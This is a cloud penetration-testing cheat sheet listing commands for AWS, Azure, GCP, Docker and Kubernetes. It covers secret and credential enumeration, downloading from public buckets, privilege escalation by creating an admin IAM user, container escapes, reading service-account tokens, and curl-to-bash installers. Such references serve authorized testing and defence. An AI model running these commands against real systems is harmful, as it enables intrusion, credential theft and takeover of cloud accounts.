CLOUD PENETRATION TESTING

⚠️ LEGAL WARNING: Only test cloud resources you own or have explicit authorization to test.

☁️ AWS PENETRATION TESTING

AWS CLI Setup & Enumeration

                    # Install AWS CLI

curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"

unzip awscliv2.zip

sudo ./aws/install

# Configure credentials

aws configure

AWS Access Key ID: YOUR_ACCESS_KEY

AWS Secret Access Key: YOUR_SECRET_KEY

# Identity & Access Management (IAM) Enumeration

aws iam get-user

aws iam list-users

aws iam list-roles

aws iam list-policies

aws iam get-account-authorization-details

# EC2 Enumeration

aws ec2 describe-instances

aws ec2 describe-security-groups

aws ec2 describe-snapshots --owner-ids self

aws ec2 describe-volumes

# S3 Bucket Enumeration

aws s3 ls

aws s3 ls s3://bucket-name --no-sign-request

aws s3api list-buckets

aws s3api get-bucket-acl --bucket bucket-name

aws s3api get-bucket-policy --bucket bucket-name

# Download from public S3

aws s3 sync s3://bucket-name . --no-sign-request

# Lambda Functions

aws lambda list-functions

aws lambda get-function --function-name function-name

# RDS (Database) Enumeration

aws rds describe-db-instances

aws rds describe-db-snapshots

# CloudTrail (Logging)

aws cloudtrail describe-trails

aws cloudtrail get-trail-status --name trail-name

# Secrets Manager

aws secretsmanager list-secrets

aws secretsmanager get-secret-value --secret-id secret-name

S3 Bucket Exploitation

                    # Test for public access

aws s3 ls s3://bucket-name --no-sign-request

# Upload to writable bucket

echo "test" > test.txt

aws s3 cp test.txt s3://bucket-name/ --no-sign-request

# S3Scanner

python3 s3scanner.py --bucket-file buckets.txt

# Gray Hat Warfare (Public S3 search)

# Visit: buckets.grayhatwarfare.com

# Common bucket naming patterns

company-backups

company-data

company-logs

company-dev

company-prod

AWS Privilege Escalation

                    # Create new IAM user

aws iam create-user --user-name hacker

aws iam create-access-key --user-name hacker

# Attach admin policy

aws iam attach-user-policy --user-name hacker --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Create IAM role

aws iam create-role --role-name HackerRole --assume-role-policy-document file://trust-policy.json

# Pass role to EC2

aws ec2 run-instances --iam-instance-profile Name=AdminProfile

AWS Pentesting Tools

                    # Pacu - AWS Exploitation Framework

git clone https://github.com/RhinoSecurityLabs/pacu.git

cd pacu

pip3 install -r requirements.txt

python3 pacu.py

# ScoutSuite - Multi-cloud security auditing

pip install scoutsuite

scout aws

# Prowler - AWS Security Assessment

git clone https://github.com/prowler-cloud/prowler

cd prowler

./prowler

# CloudMapper - AWS Visualization

python cloudmapper.py collect --account my-account

python cloudmapper.py prepare --account my-account

python cloudmapper.py webserver

☁️ AZURE PENETRATION TESTING

Azure CLI & Enumeration

                    # Install Azure CLI

curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

# Login

az login

# Account Information

az account list

az account show

# Active Directory Enumeration

az ad user list

az ad group list

az ad sp list --all

# Virtual Machines

az vm list

az vm list-ip-addresses

az vm show --name vm-name --resource-group rg-name

# Storage Accounts

az storage account list

az storage account keys list --account-name storage-name

az storage container list --account-name storage-name

# Key Vault

az keyvault list

az keyvault secret list --vault-name vault-name

az keyvault secret show --vault-name vault-name --name secret-name

# Web Apps

az webapp list

az webapp config show --name app-name --resource-group rg-name

Azure AD Attacks

                    # AADInternals (PowerShell)

Install-Module AADInternals

Import-Module AADInternals

# Get tenant information

Get-AADIntLoginInformation -UserName user@domain.com

# Get access token

Get-AADIntAccessToken -ClientID "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Resource "https://graph.microsoft.com"

# MicroBurst

Import-Module MicroBurst.psm1

Get-AzureDomainInfo -Verbose

Invoke-EnumerateAzureBlobs -Base company

# ROADtools

roadrecon auth

roadrecon gather

roadrecon gui

Azure Storage Attacks

                    # MicroBurst blob enumeration

Invoke-EnumerateAzureBlobs -Base company

# Azure Storage Explorer

# Download: https://azure.microsoft.com/en-us/features/storage-explorer/

# Access public blobs

https://storage-account.blob.core.windows.net/container/file.txt

☁️ GOOGLE CLOUD PLATFORM (GCP)

GCloud CLI & Enumeration

                    # Install gcloud

curl https://sdk.cloud.google.com | bash

exec -l $SHELL

# Authentication

gcloud auth login

gcloud auth list

# Project Enumeration

gcloud projects list

gcloud config set project project-id

# Compute Instances

gcloud compute instances list

gcloud compute instances describe instance-name

gcloud compute disks list

gcloud compute images list

# Storage Buckets

gsutil ls

gsutil ls -r gs://bucket-name

gsutil cp gs://bucket-name/file .

# IAM

gcloud projects get-iam-policy project-id

gcloud iam service-accounts list

gcloud iam service-accounts keys list --iam-account=sa@project.iam.gserviceaccount.com

# Cloud Functions

gcloud functions list

gcloud functions describe function-name

# Cloud SQL

gcloud sql instances list

gcloud sql databases list --instance=instance-name

GCP Bucket Enumeration

                    # GCPBucketBrute

python3 gcpbucketbrute.py -k keywords.txt

# Test public access

gsutil ls gs://bucket-name

curl https://storage.googleapis.com/bucket-name/file.txt

# Common naming patterns

company-backup

company-staging

company-prod

company_assets

🐳 DOCKER & KUBERNETES SECURITY

Docker Security Testing

                    # Enumerate containers

docker ps

docker ps -a

docker images

# Docker escape (privileged container)

docker run --rm -it --privileged --pid=host alpine nsenter -t 1 -m -u -i sh

# Mount host filesystem

docker run -v /:/hostOS -it alpine

cd /hostOS

# Docker socket exposure

curl --unix-socket /var/run/docker.sock http://localhost/containers/json

# Dive - Analyze Docker images

dive image-name

Kubernetes Security

                    # kubectl commands

kubectl cluster-info

kubectl get nodes

kubectl get pods --all-namespaces

kubectl get secrets --all-namespaces

kubectl get configmaps --all-namespaces

# Execute in pod

kubectl exec -it pod-name -- /bin/bash

# kube-hunter (vulnerability scanner)

kube-hunter --remote cluster-ip

# kube-bench (CIS benchmark)

kube-bench

# Privilege escalation via ServiceAccount

cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Peirates (K8s pentesting tool)

./peirates

💡 Cloud Security Best Practices

Always get authorization before testing cloud resources
Use dedicated test accounts/projects
Enable MFA on all accounts
Follow principle of least privilege
Monitor CloudTrail/Activity Logs for anomalies
Encrypt data at rest and in transit
Regularly rotate credentials
Use infrastructure as code (Terraform, CloudFormation)